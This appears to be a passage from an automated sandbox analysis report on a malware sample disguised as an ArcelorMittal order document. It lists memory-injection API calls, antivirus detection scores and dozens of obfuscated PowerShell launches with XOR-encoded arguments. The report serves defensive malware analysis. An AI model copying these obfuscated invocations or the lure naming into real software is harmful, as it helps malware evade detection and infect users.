            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 151_2_1D3046C4151_2_1D3046C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 151_2_1D305D20151_2_1D305D20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 151_2_1D306AF1151_2_1D306AF1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FB0A49 NtMapViewOfSection,1_2_02FB0A49
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FAE63C NtAllocateVirtualMemory,1_2_02FAE63C
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FAFC1A NtProtectVirtualMemory,1_2_02FAFC1A
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dll
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeStatic PE information: invalid certificate
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeReversingLabs: Detection: 73%
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeVirustotal: Detection: 62%
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeMetadefender: Detection: 33%
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeFile read: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeJump to behavior
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A41D7 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656176C0 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x46696EC0 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x41286F85 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x72342289 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20692295 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x78383295 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C22CC -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302E85 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20692291 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783A95 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30296B8B -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x723322FC -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A54CC -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x727477C4 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6C416EC9 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6F632ACC -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C6B85 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783395 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783195 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30302E85 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x692032DD -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x34302BD5 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2E7233FC -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A51C0 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x74466BC9 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x65506DCC -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6E7467D7 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x28697096 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x31343091 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x202C22CC -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302ECC -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302BCC -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2E7230FC -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A50C0 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x616444CC -bxor 677
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6C652ACC -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x72332E85 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x69207094 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783395 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C2A6B85 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302BCC -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2E7230FC -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x757367D7 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3332389F -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x43616EC9 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6F7752D7 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6F63438D -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x69723385 -bxor 677
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C692295 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C692295 -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C22CC -bxor 677
